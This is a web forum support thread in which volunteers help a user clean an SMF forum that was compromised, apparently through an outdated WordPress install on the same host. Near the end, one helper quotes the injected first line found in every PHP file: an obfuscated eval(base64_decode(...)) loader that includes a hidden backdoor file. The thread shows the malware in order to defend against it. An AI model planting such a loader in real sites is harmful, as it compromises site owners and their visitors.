forum not found...

jiajia · December 27, 2010, 12:49:09 AM

Just a quick one here, after months of full functioning use the main index of my forum is visible but any attempts to navigate the forum results in a 'this link appears to be broken'

My old database backups were lost on a broken harddrive so a simple restore is not an option.

Forum is now completely unfunctional. Any simple solutions to this problem?

JBlaze · December 27, 2010, 04:19:41 AM

What is repair_settings.php?

jiajia · December 29, 2010, 02:09:42 AM

Thanks JBlaze

Well I ran the repair_settings php file and the only error I see is that queryless URLS is neither off nor on, stating there is no value found. When I turn them either on or off, then return to the repair_settings page they are both off again with that error message. Am I barking up the wrong tree or is this a likely source of problem? If it is how can I get the damn thing to stay on? All the paths seem to be correct, and all the other settings are set to 'recommended', as well as I checked the SQL database and the result was everything ok. A little confused here.

JimM · December 30, 2010, 08:59:31 PM

Welcome to SMF.

You might want to include a link to your forum so we can take a look at what is happening.

jiajia · December 30, 2010, 09:49:54 PM

http://www.kingsternet.com/forum [nofollow]

Main page works fine, any other pages are unfindable.

JimM · December 31, 2010, 01:10:20 PM

Have a look at your main page by displaying the source. Did you add all those links at the bottom? Might not be anything but that looks suspicious to me.

Did this just start to happen? You mention backups of your database. Can you verify that the database is intact with phpMyAdmin or something similiar?

kat · December 31, 2010, 01:54:28 PM

Hmm... This looks familiar... http://www.simplemachines.org/community/index.php?topic=415151.0

Have a look at index.php. Any one of them.

Is the first line:

<?php

Simply that and nothing else?

If it's that with a load of weird stuff, after it, you have a problem.

JBlaze · December 31, 2010, 01:56:50 PM

Heh. SiteGround. I'm lulzing.

kat · December 31, 2010, 02:07:43 PM

Good, are they?

[/irony]

JBlaze · December 31, 2010, 02:11:50 PM

About as good as a midget in a slam dunk contest.

kat · December 31, 2010, 02:19:21 PM

Ah...

Could well be that hack, then.

Uh-oh...

jiajia · January 01, 2011, 06:28:21 AM

So... I'm guessing thats it...

Now, whats the best way to fix it... I know they say every file must be edited, but what is every file? Every PHP file? In the root folder? Or in every folder on the site?

And how can we prevent this in the future? I suspect we are high targets for a repeat attack at some stage.... Something I can take up with siteground?

jiajia · January 01, 2011, 06:40:36 AM

Quote from: K@ on December 31, 2010, 01:54:28 PM

Is the first line:

<?php

Simply that and nothing else?

If it's that with a load of weird stuff, after it, you have a problem.

Hmm, you mean like this?

jiajia · January 01, 2011, 10:45:22 AM

So I've confirmed thats the case... Siteground offers standard malicious code clean up for $99 and advanced code cleanup for $199... I've read the threads on how to deal with it and I'm a bit over my head on this... any cheaper alternatives out there?

Also I've found out it may have attacked through an outdated wordpress on the same website as my SMF, this seems to further complicate matters.

kat · January 01, 2011, 12:30:03 PM

Do you have many mods installed?

If not, you could get the SMF install archive and upload all the files, EXCEPT Settings.php and Install.php, to your site, overwriting what's there, now.

Note that if you have mods, they'll need to be reapplied.

JimM · January 01, 2011, 03:22:32 PM

* JimM wonders why K@ suggested the install package instead of the upgrade package which does not include the Settings.php files.

If everything is uploaded by mistake at least it doesn't wipe out a good settings file!

If you know that the attack came from the outdated script, you may be ok just replacing all your files as K@ suggested. I would at least try that before paying the host to fix it.

kat · January 01, 2011, 03:49:43 PM

I suggested the install, as that contains EVERY PHP file.

Every file is likely to be affected, with this.

At least, on the sites I looked at, they sure were.

At least this one doesn't seem to affect .js files, like the last one did.

JimM · January 01, 2011, 05:19:18 PM

Ahh, but so does the Upgrade package with the exception of the Settings files.

kat · January 01, 2011, 05:27:56 PM

I have to confess...

I've never looked at them, that closely, to be honest.

Worth remembering, though, that.

Ta!

jiajia · January 07, 2011, 09:22:38 AM

Just uploading the upgrade package didn't seem to work.

Any new ideas?

Illori · January 07, 2011, 10:08:34 AM

which zip file are you trying to upload and where exactly are you trying to upload it?

kat · January 07, 2011, 11:13:33 AM

You ARE dearchiving the file, before uploading the contents thereof...?

You don't upload the file, as-is.

Illori · January 07, 2011, 11:18:00 AM

well you could upload the zip, then use your cpanel file manager to extract it in place overriding all files, but most people do it like you suggested and upload the extracted files.

kat · January 07, 2011, 11:25:08 AM

I just saw

Quote from: jiajia on January 07, 2011, 09:22:38 AM
Just uploading the upgrade package didn't seem to work.

and assumed he'd uploaded the archive, as-is, and nothing done else.

Some people have to be spoon-fed this stuff.

Illori · January 07, 2011, 11:40:42 AM

i was also thinking they may be trying to upload it to the package manager as well, and depending on the file they downloaded it may not work that way.

kat · January 07, 2011, 11:42:57 AM

Yeah. Sadly, guesswork makes up a lot of what we do, here.

Quite often, we guess right.

Sometimes, we don't .

NanoSector · January 07, 2011, 11:58:09 AM

EDIT: Whoops didn't know there was a second page

Quote from: Illori on January 07, 2011, 11:40:42 AM
i was also thinking they may be trying to upload it to the package manager as well, and depending on the file they downloaded it may not work that way.

If the user doesn't have access to the forum it's pretty logical they can't upload it to the package manager, no?

I think we should have restore packages for SMF

jiajia · January 07, 2011, 05:52:23 PM

Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, than uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.

NanoSector · January 07, 2011, 06:12:18 PM

Quote from: jiajia on January 07, 2011, 05:52:23 PM
Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, than uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.

A-a-all?!
*shudders*
tell me you didn't overwrite Settings.php!!

jiajia · January 08, 2011, 02:43:14 AM

Quote from: Simple Series team on January 07, 2011, 06:12:18 PM
Quote from: jiajia on January 07, 2011, 05:52:23 PM
Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, than uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.
A-a-all?!
*shudders*
tell me you didn't overwrite Settings.php!!

Hehe no didn't do that. I edited settings.php to remove the malicious code at the top and then re-uploaded it. Sorry, should have been more specific.

NanoSector · January 08, 2011, 11:54:07 AM

Quote from: jiajia on January 08, 2011, 02:43:14 AM
Quote from: Simple Series team on January 07, 2011, 06:12:18 PM
Quote from: jiajia on January 07, 2011, 05:52:23 PM
Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, than uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.
A-a-all?!
*shudders*
tell me you didn't overwrite Settings.php!!

Hehe no didn't do that. I edited settings.php to remove the malicious code at the top and then re-uploaded it. Sorry, should have been more specific.

*phew* I was worried lol

kat · January 08, 2011, 02:25:59 PM

If you read this http://www.simplemachines.org/community/index.php?topic=87130.0 and you're OK with it, PM me your FTP details (URL, username, password) and I'll take a look, in case there're other files that the package doesn't have.

Could take me a while, obviously.

JimM · January 08, 2011, 02:38:51 PM

Give us a few more details. Just saying it doesn't work doesn't give us enough to go on.

ETA: Disregard. I didn't read the 2nd page. I just saw the same comment that K@ did about it nor working.

kat · January 08, 2011, 02:40:25 PM

It's gonna be an infected file, Jim, I reckon.

One of the mods that were there, perhaps?

JimM · January 08, 2011, 02:58:21 PM

It appears that the forum is in maintenance mode. The error seems to be something to do with your blog or the integration of WordPress with SMF.

kat · January 09, 2011, 08:53:50 AM

It's as I suspected.

All the files in the custom theme directories were infected.

I've cleaned them all out.

Well, I say "All", but I've left some.

In your theme directories, some of the themes have every language file known to man, in there.

Cleaning those out's gonna take me DAYS!

Can you do me a favour?

Can you go to the "languages" directory in the default theme's directory, and delete all the languages that you don't need?

Then, I can just clean-out those that you need.

jiajia · January 10, 2011, 01:36:55 AM

Quote from: K@ on January 09, 2011, 08:53:50 AM
It's as I suspected.

All the files in the custom theme directories were infected.

I've cleaned them all out.

Well, I say "All", but I've left some.

In your theme directories, some of the themes have every language file known to man, in there.

Cleaning those out's gonna take me DAYS!

Can you do me a favour?

Can you go to the "languages" directory in the default theme's directory, and delete all the languages that you don't need?

Then, I can just clean-out those that you need.

I'm pretty sure all we need is English.

jiajia · January 10, 2011, 05:17:30 AM

Ok so I saw what you mean, I ended up just deleting many of the themes we never use and just kept two, the default and the ds_natural theme. The default theme was loaded with obscure languages which I trimmed out but why was the language folder in the ds_natural (the boards default theme) empty?

Illori · January 10, 2011, 05:22:41 AM

by default all template files/language files are used from the default theme, so that you dont need to install/copy them to each theme that is used unless they are very different from the default.

kat · January 10, 2011, 05:48:36 AM

OK. I'm just cleaning those, now.

Gimme a while...

kat · January 10, 2011, 05:58:38 AM

OK. To the best of my knowledge, you now have clean files.

First thing to do, I'd suggest, is to BACKUP YOUR FORUM!!

That way, should you get reinfected, you'll have clean files to replace everything with.

I notice that you have a directory named "languages.BACKUP". Every single file, in there, is infected.

If you don't need that, just delete the whole directory.

I checked the javascript files, but they don't seem to have been got-at.

Everything SHOULD be OK, now.

Might be an idea to let your host know about the infection, too.

This line was added to every php file, as the first line:

Code Select

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2tpbmdzdGVyL3B1YmxpY19odG1sL2Jsb2cvd3AtaW5jbHVkZXMvanMvdGlueW1jZS90aGVtZXMvYWR2YW5jZWQvc2tpbnMvbzJrNy9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

I took your site out of Maintenance mode and everything seems OK.

jiajia · January 10, 2011, 12:47:17 PM

I can't thank you enough. Made the backup and I'll see how things go. The wordpress blog doesn't seem to be functioning but it should be tame enough. All you did was remove that line at the top from every .php file? I had started doing that, but wasn't seeing any results so I had stopped after like ten...

kat · January 10, 2011, 12:52:43 PM

Yeah, I know the feeling.

Sadly, it's often the way that things can be affected by just one file, even though every other one was clean.

I'd like to meet some of these hackers and get locked in a room, with them...

Script-kiddies with minuscule penises, I reckon, like their Spam friends.

jiajia · January 10, 2011, 12:53:19 PM

There seems to be some sort of issue with submitting data. Everything works, you can click around and read old posts, until you try to login or post.... then it has some sort of error. You'll see what I mean if you try to register...?

kat · January 10, 2011, 12:55:26 PM

No images in CAPTCHA...

Lemme check those.

BRB.

jiajia · January 10, 2011, 12:57:43 PM

Something going on with the uploader as well... I think I may have gone overboard deleting files, but the updater informs me that "The upgrader found some old or outdated language files.

Please make certain you uploaded the new versions of all the files included in the package, even the theme and language files for the default theme.

Click here to try again. "

I re-uploaded a brand spankin' new smf update, uploaded it, and still the same. I'm starting to think hosting a forum wasn't the best idea to volunteer for.

kat · January 10, 2011, 01:01:42 PM

Weirdness...

Your default theme had a billion language DIRECTORIES in it's "images" directory, for some reason...

Is this forum relatively new, by any chance?

jiajia · January 10, 2011, 01:03:21 PM

Quote from: K@ on January 10, 2011, 01:01:42 PM
Weirdness...

Your default theme had a billion language DIRECTORIES in it's "images" directory, for some reason...

Is this forum relatively new, by any chance?

Define new, its more than a year old, possibly two...

kat · January 10, 2011, 01:05:57 PM

As you've just backed-up, let me get rid of some stuff that's definitely in the wrong places.

Gimme a while, again...

kat · January 10, 2011, 01:08:36 PM

Can you PM me an admin account access, please?

I can check some other stuff out, then.

kat · January 10, 2011, 01:28:17 PM

Found something...

Gimme ten minutes, or so.

jiajia · January 10, 2011, 01:45:24 PM

Quote from: K@ on January 10, 2011, 01:28:17 PM
Found something...

Gimme ten minutes, or so.

5....4....3...2....?

kat · January 10, 2011, 01:48:53 PM

Everything's clean, but I'm getting session ID hassles, when I try to log in.

I'm trying to figure-out why.

News:

forum not found...

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat

kat